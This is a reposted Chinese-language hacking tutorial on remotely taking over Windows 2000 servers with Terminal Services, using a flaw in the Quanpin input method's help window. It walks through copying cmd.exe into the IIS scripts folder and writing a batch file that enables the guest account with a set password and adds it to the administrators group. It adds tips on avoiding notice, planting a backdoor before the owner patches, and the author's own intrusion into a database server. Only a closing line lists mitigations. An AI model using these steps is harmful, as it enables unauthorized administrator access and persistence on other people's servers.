3389埠的入侵，Win Server2000 全拼輸入法漏洞（轉）

由於微軟對中國產品不付責任的態度，使得安裝了終端服務和全拼的w2k 伺服器存在著遠端登陸並能獲取超級使用者許可權的嚴重漏洞。
其過程如下：

1.掃描 3389 port 終端服務預設；
2.用終端客戶端程式進行連線；
3.按ctrl+shift調出全拼輸入法（其他似乎不行），點滑鼠右鍵（如果其幫助選單發灰，就趕快趕下家吧，人家打補丁了），點幫助，點輸入法入門；
4.在"選項"選單上點右鍵---&gt跳轉到URL"，輸入：c:\winnt\system32\cmd.exe.（如果不能確定NT系統目錄，則輸入：c:\ 或d:\
……進行查詢確定）；
5.選擇"儲存到磁碟" 選擇目錄：c:\inetpub\scripts\，因實際上是對方伺服器上檔案自身的複製操作，所以這個過程很快就會完成；
6.開啟IE，輸入 dir 怎麼樣？有cmd.exe檔案了吧？這我們就完成了第一步；
7 echo net user guest /active:yes>go.bat
8 echo net user guest elise>>go.bat
9 echo net localgroup administrators /add
guest>>go.bat
10 type go.bat 看看我們的批檔案內容是否如下：

net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"選項"選單上點右鍵---&gt跳轉到URL"，輸入：c:\inetpub\scripts\go.bat ---&gt在磁碟當前位置執行；
12. 呵呵，大功告成啦，這樣我們就啟用了伺服器的geust帳戶，密碼為：elise，超級使用者呢！（我喜歡guest而不是建立新帳戶，這樣似乎不易被發現 些），這樣你就可用IPC$連線，想怎樣做就怎樣做了，當然，你也可用guest直接登陸到他的伺服器，到他機器上去跳舞吧:-)

注意事項：
1.當你用終端客戶端程式登陸到他的伺服器時，你的所有操作不會在他的機器上反應出來，但如果他正開啟了終端服務管理器，你就慘了了：（這時他能看到你所開啟的程式id、程式映象，你的ip及機器名，並能發訊息給你！
2.當你連線時，會加重對方伺服器的負荷，非常容易造成對方當機和斷線，所以你的操作快點為妙。
3.儘快做好後門，暫時不要上傳任何程式，一是防止斷線，二是防止對方打上補丁！
個人觀點：
1.在IE下，所擁有的只是iusr_machine許可權，因而，你不要設想去做越權的事情，如啟動telnet、木馬等；
2.url的跳轉下，你將擁有超級使用者的許可權，好好利用吧
3.跳轉到哪個目錄下，通常只能檢視、執行當前目錄的檔案，不能進入到子目錄，如想進入，再跳一次吧！：）
4.此法似乎與對方的防火牆無關哦！
5.據本人實際操作，發現極易斷線，但應與佔用伺服器資源無關。對方是384M RAM+PIII,是靜態IP，主要是做資料庫伺服器，RAID硬碟，SCSI CD
ROM,開機18天了，02：00進去時，仍時常吊線。

堵漏辦法：
1.打補丁；
2.刪掉全拼輸入法，用標準就成了嘛^_^；
3.服務中關掉：Terminal Services，服務名稱：TermService，對應程式名：system32\termsrv.exe；